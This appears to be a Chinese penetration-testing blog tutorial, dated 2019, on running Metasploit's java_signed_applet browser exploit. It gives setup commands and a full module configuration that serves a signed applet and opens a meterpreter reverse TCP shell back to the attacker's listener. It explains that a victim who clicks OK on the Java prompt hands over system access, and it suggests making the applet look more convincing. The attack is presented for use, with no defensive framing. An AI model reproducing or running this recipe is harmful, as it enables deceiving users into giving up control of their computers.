Java签名的Applet攻击 教程

1、安装 Sun Java JDK 和 rjb gem:

root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb

 

2、设置环境变量:

root@bt: echo “JAVA_HOME=/usr/lib/jvm/java-6-sun” >> /etc/bash.bashrc
root@bt: echo “export JAVA_HOME” >> /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME

 

3、启动metasploit framework,并运行相关模块命令:

use exploit/multi/browser/java_signed_applet
set TARGET 1 //请注意你的目标
set SRVHOST 10.2.4.200
set SRVPORT 80
set URIPATH pentura
set PAYLOAD /meterpreter/reverse_tcp
set LHOST 10.2.4.200
set LPORT 4444

 

如果当有一台机子访问了你的80端口,msf控制端里将会显示详细的信息。

这时,访问你80端口的机子浏览器会跳出java窗口,如果目标点击确定,你就能取得系统权限,你还可以修改java小程序的,以便实现更加真实的SSL。

    A+
发布日期:2019年12月07日 14:36:29  所属分类:渗透测试
最后更新时间:2019-12-07 14:36:29
付杰
iOS应用开发指南第5季:界面布局与屏幕适配
  • ¥ 89.0元
  • 市场价:129.0元
购买
详情
Sublime Text3使用视频教程:神级代码编辑工具
  • ¥ 15.0元
  • 市场价:15.0元
购买
详情
《Java从小白到大牛》第4篇:项目实战 宠物商店
  • ¥ 159.0元
  • 市场价:398.0元
购买
详情
Lucene全文检索+Solr搜索引擎
  • ¥ 59.0元
  • 市场价:99.0元
购买
详情

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: